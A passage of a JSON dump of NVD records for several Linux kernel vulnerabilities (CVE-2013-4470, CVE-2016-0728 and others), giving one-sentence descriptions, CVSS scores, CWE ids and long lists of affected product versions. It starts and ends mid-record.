4.0.6 do not properly consider yielding a processor, which allows remote attackers to cause a denial of service (system hang) via incorrect checksums within a UDP packet flood.", "cvss3": {}, "published": "2015-08-31T10:59:00", "type": "cve", "title": "CVE-2015-5364", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5364"], "modified": "2023-02-02T19:17:00", "cpe": 
["cpe:/o:redhat:enterprise_linux_server_aus:6.5", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "CVE-2015-5364", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5364", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-31T14:14:13", "description": "Race condition in arch/x86/mm/tlb.c in the Linux kernel before 4.4.1 allows local users to gain privileges by triggering access to a paging structure by a different CPU.", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "type": "cve", "title": "CVE-2016-2069", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2016-2069"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:linux:linux_kernel:4.4"], "id": "CVE-2016-2069", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2069", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T02:25:08", "description": "drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel before 4.5 does not properly identify error conditions, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted packets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "type": "cve", "title": "CVE-2015-8812", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2023-01-19T16:13:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10", 
"cpe:/o:novell:suse_linux_enterprise_real_time_extension:12", "cpe:/o:canonical:ubuntu_linux:12.04"], "id": "CVE-2015-8812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*"]}, {"lastseen": "2023-05-31T14:06:11", "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-08T03:59:00", "type": "cve", "title": "CVE-2016-0728", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2023-02-12T23:15:00", "cpe": 
["cpe:/o:google:android:4.1", "cpe:/o:google:android:4.0.2", "cpe:/o:google:android:4.4", "cpe:/o:google:android:4.2.1", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:google:android:4.3", "cpe:/o:google:android:4.0.3", "cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:google:android:4.3.1", "cpe:/o:google:android:4.4.2", "cpe:/o:google:android:4.4.3", "cpe:/o:google:android:5.1.1", "cpe:/o:google:android:6.0", "cpe:/o:google:android:5.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:google:android:6.0.1", "cpe:/o:google:android:5.1", "cpe:/o:google:android:4.0.1", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/a:hp:server_migration_pack:7.5", "cpe:/o:google:android:4.2.2", "cpe:/o:google:android:4.0.4", "cpe:/o:google:android:5.1.0", "cpe:/o:google:android:5.0.1", "cpe:/o:google:android:4.0", "cpe:/o:google:android:4.4.1", "cpe:/o:google:android:4.2", "cpe:/o:google:android:5.0.2", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:google:android:4.1.2"], "id": "CVE-2016-0728", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0728", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:server_migration_pack:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.0:*:*:*:*:*:*:*", 
"cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe:2.3:o:google:android:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:13:06", "description": "Multiple stack-based buffer overflows in the magicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver in the Linux kernel through 3.16.3 allow physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that provides a large amount of (1) EHCI or (2) XHCI data associated with an event.", "cvss3": {}, "published": "2014-09-28T10:55:00", "type": "cve", "title": "CVE-2014-3181", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2015-03-26T01:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.16.1", "cpe:/o:linux:linux_kernel:3.16.0", "cpe:/o:linux:linux_kernel:3.16.2", "cpe:/o:linux:linux_kernel:3.16.3"], "id": "CVE-2014-3181", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3181", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:09:47", "description": "The security_context_to_sid_core function in security/selinux/ss/services.c in the Linux kernel before 3.13.4 allows local users to cause a denial of service (system crash) by leveraging the CAP_MAC_ADMIN capability to set a zero-length security context.", "cvss3": {}, "published": "2014-02-28T06:18:00", "type": "cve", "title": "CVE-2014-1874", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1874"], "modified": "2023-02-13T00:38:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/o:canonical:ubuntu_linux:12.04"], "id": "CVE-2014-1874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1874", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*", 
"cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-31T14:58:54", "description": "The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.", "cvss3": {}, "published": "2013-11-04T15:55:00", "type": "cve", "title": "CVE-2013-4470", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4470"], "modified": "2023-02-13T04:47:00", "cpe": ["cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.11.2", 
"cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.9.11", 
"cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.10.0", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.4.11", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.6", 
"cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.3.4", 
"cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.2.25"], "id": "CVE-2013-4470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4470", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.12:*:*:*:*:*:*:*", 